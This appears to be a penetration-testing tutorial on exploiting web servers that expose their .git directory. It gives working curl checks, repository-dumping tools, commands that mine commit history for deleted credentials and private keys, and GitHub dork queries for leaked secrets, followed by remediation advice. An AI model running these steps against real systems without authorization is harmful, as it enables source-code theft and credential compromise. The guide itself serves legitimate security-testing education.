Exposed .git Recon: Dumping Repositories, Mining Secrets, and GitHub Dorking
A web server that serves its own .git directory is one of the highest-value, lowest-effort findings in web reconnaissance. When a deployment copies a working tree to the document root without stripping version-control metadata, the entire repository — every source file, every commit message, and every secret that was ever committed and later "removed" — becomes downloadable by anyone who knows the right paths. On an authorized engagement this single misconfiguration frequently collapses the gap between unauthenticated external access and full source-code review, hardcoded credentials, and internal infrastructure mapping.
This guide covers the full workflow a pentester uses against an exposed repository: confirming the exposure, reconstructing the working tree even when directory listing is disabled, mining deleted secrets out of commit history, pivoting to public code via GitHub dorking, and the automated tooling that ties it together. Everything here assumes you have written authorization to test the target in scope — Git recon is read-heavy and quiet, but it still touches systems you must be permitted to assess.
Confirming an Exposed .git Directory
The fastest signal is a request for /.git/HEAD. A valid Git repository returns a tiny file containing a ref pointer; a 404 or an HTML error page means the path is not exposed. Never rely on /.git/ returning a directory listing — most production servers disable autoindex, so the directory looks empty while the individual objects are still fully retrievable.
# The canonical one-liner: HEAD always exists in a real repo
curl -s https://target.example/.git/HEAD
# Expected: ref: refs/heads/main
# Other reliable indicator files
curl -s https://target.example/.git/config
curl -s https://target.example/.git/logs/HEAD
curl -s https://target.example/.git/index -o index.bin
# Quick triage of many hosts from a file
while read host; do
code=$(curl -s -o /dev/null -w "%{http_code}" "$host/.git/HEAD")
[ "$code" = "200" ] && echo "EXPOSED: $host"
done < hosts.txt
Watch for false positives. Single-page-app catch-all routing often returns 200 OK with an HTML body for every path, including /.git/HEAD. Always inspect the body: a real HEAD is a few bytes of plaintext starting with ref: (or a raw 40-character SHA-1 in detached-head state), never a <!DOCTYPE html>.
Dumping the Repository Without Directory Listing
When autoindex is off, you cannot simply recurse the directory. Instead you reconstruct the repository by following Git's internal object graph. Git stores everything as content-addressed objects under .git/objects/, named by their SHA-1 hash split into a two-character directory and a 38-character filename. The trick is to start from known references, parse each object you fetch, extract the hashes it points to, and fetch those in turn.
- Refs and packed-refs —
.git/HEAD,.git/refs/heads/*, and.git/packed-refsgive you the commit hashes that anchor the graph. - Commit objects point to a tree object and to parent commits, letting you walk history backwards.
- Tree objects map filenames to blob hashes and to sub-tree hashes (directories).
- Blob objects are the actual file contents.
- The index (
.git/index) lists every staged path and its blob hash — often the single richest source of object hashes.
Git objects are zlib-compressed, so you decompress, read the type and hashes, and queue the next fetch. A minimal manual demonstration:
# Fetch and inflate a single loose object by hash
H=8c9b1f2a... # a 40-char SHA from HEAD or packed-refs
curl -s "https://target.example/.git/objects/${H:0:2}/${H:2}" \
| python3 -c "import sys,zlib; sys.stdout.buffer.write(zlib.decompress(sys.stdin.buffer.read()))"
# A commit object reveals its tree + parent — follow those hashes next
# tree d670460... <- fetch /.git/objects/d6/70460...
# parent 4a1c9e3... <- the previous commit
# author Jane Dev 1700000000 +0000
In practice nobody walks the graph by hand — tooling does it. But understanding the object model matters: it explains why dumps succeed even with listing disabled, and why you must also pull .git/objects/pack/*.pack and the corresponding .idx files, since older history is frequently delta-compressed into packfiles rather than stored as loose objects.
Automated Dumping Tools
Several mature tools handle reference discovery, object-graph traversal, packfile retrieval, and final checkout. They make hundreds of small requests, so throttle them on production targets and respect any rate-limit guidance in your rules of engagement.
# git-dumper — the most reliable all-in-one dumper
pip install git-dumper
git-dumper https://target.example/.git/ ./dump
# It pulls refs, loose objects, packfiles, then runs `git checkout`
# GitTools — classic three-part toolkit
# 1) Dumper: blind-fetch objects when listing is off
./gitdumper.sh https://target.example/.git/ ./dump
# 2) Extractor: rebuild every commit into separate folders
./extractor.sh ./dump ./extracted
# 3) Finder: scan a list of hosts for exposed .git
# After dumping, restore any missing files Git knows about
cd dump && git checkout -- . 2>/dev/null
git status # shows files Git expected but couldn't fetch
A partial dump is still useful. Even if some blobs 404, git log, git show, and the recovered .git/config often expose remote URLs (sometimes with embedded credentials), CI tokens, and the developer email addresses you will reuse for password-spray or phishing-awareness assessment later.
Mining Secrets From Commit History
The real prize is history. Developers routinely commit an API key, notice it, delete it in the next commit, and assume it is gone. It is not — the blob still lives in the object database, reachable through the old commit. Once you have a local clone, you walk every revision of every file.
# Search the entire history (all commits, all branches) for a pattern
git log -p --all -S 'AKIA' | grep -i 'AKIA'
# Show every version of a file across history
git log --all --oneline -- config/database.yml
git show :config/database.yml
# Diff-grep across history for common secret keywords
git log --all -p | grep -iE 'password|secret|api[_-]?key|token|BEGIN (RSA|EC|OPENSSH) PRIVATE KEY'
# Recover content from dangling/unreachable objects (deleted commits)
git fsck --unreachable | awk '/blob/ {print $3}' \
| while read b; do git cat-file -p "$b"; done | grep -iE 'AKIA|secret'
Dedicated history scanners are far more thorough than manual grep because they understand entropy and provider-specific key formats:
- trufflehog —
trufflehog git file://./dumpscans every commit and can verify live AWS, GitHub, Slack, and other tokens against their APIs to eliminate false positives. - gitleaks —
gitleaks detect --source ./dump -vuses a regex+entropy ruleset and emits a structured report ideal for a findings table.
Treat any recovered key as live until proven otherwise, and prove it only through actions your authorization permits — for AWS keys, a read-only aws sts get-caller-identity confirms validity and identity without touching customer data. You can sanity-check format and high-entropy candidates against the Secret Scanner before reporting.
GitHub Dorking for Public Source and Leaks
An exposed .git on the target's own server is one vector; the other is code the organization pushed to a public host. GitHub's code search supports targeted operators that surface secrets committed to public, fork, or gist repositories — including those by employees on personal accounts.
# Org-scoped secret hunting
org:target-org password
org:target-org filename:.env
org:target-org "BEGIN RSA PRIVATE KEY"
# Domain / provider-specific leaks across all of GitHub
"target.example" AKIA # AWS keys mentioning the target
"@target.example" filename:.npmrc _authToken
"target.example" filename:config.json apikey
# High-signal filenames and paths
path:**/.aws/credentials
filename:wp-config.php DB_PASSWORD
filename:id_rsa OR filename:id_ed25519
Pair this with the equivalent Shodan, Google, and Censys queries to spot exposed services and dev artifacts. The Search Dork Generator builds these queries for GitHub, Google, Shodan, and Censys from a single target input, and the Google Dorking cheat sheet covers the operator syntax for filetype, inurl, and site filters. Always cross-check timestamps: a leaked key that predates a known rotation may already be dead, while a fresh commit to a public fork is your most urgent finding.
Defenses and Remediation
The fixes are cheap, and the highest-value report you write often includes them verbatim:
- Never deploy the
.gitdirectory. Build from a clean export (git archive) or strip.gitin the deploy step. Treat the document root as build output, not a working copy. - Block access at the web server. Return 404 for any dotfile path. In nginx:
location ~ /\.git { deny all; return 404; }; in Apache:RedirectMatch 404 /\.git. Defense in depth even when the directory should not be there at all. - Assume any committed secret is compromised forever. Rewriting history with
git filter-repoor BFG removes the blob, but rotation is the only real remediation — invalidate and reissue the credential immediately. - Keep secrets out of the repo entirely. Use environment variables, a secrets manager, and a committed
.gitignorecovering.env, key files, and config with credentials. - Scan in CI. Run gitleaks or trufflehog as a pre-commit hook and a pipeline gate so a secret never reaches history in the first place.
- Monitor public exposure. Use GitHub secret scanning / push protection and periodic dork sweeps so a leak on a personal fork is caught before an attacker dorks it.
For the reconnaissance phase that surrounds this technique — subdomain discovery, certificate transparency, and host triage that turns up forgotten dev servers serving .git — chain this work with the Recon Hub and the wider DNS enumeration workflow. Exposed repositories are most often found on staging and legacy hosts that surface only after thorough asset discovery, so a complete recon pipeline is what makes this finding repeatable rather than lucky.
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides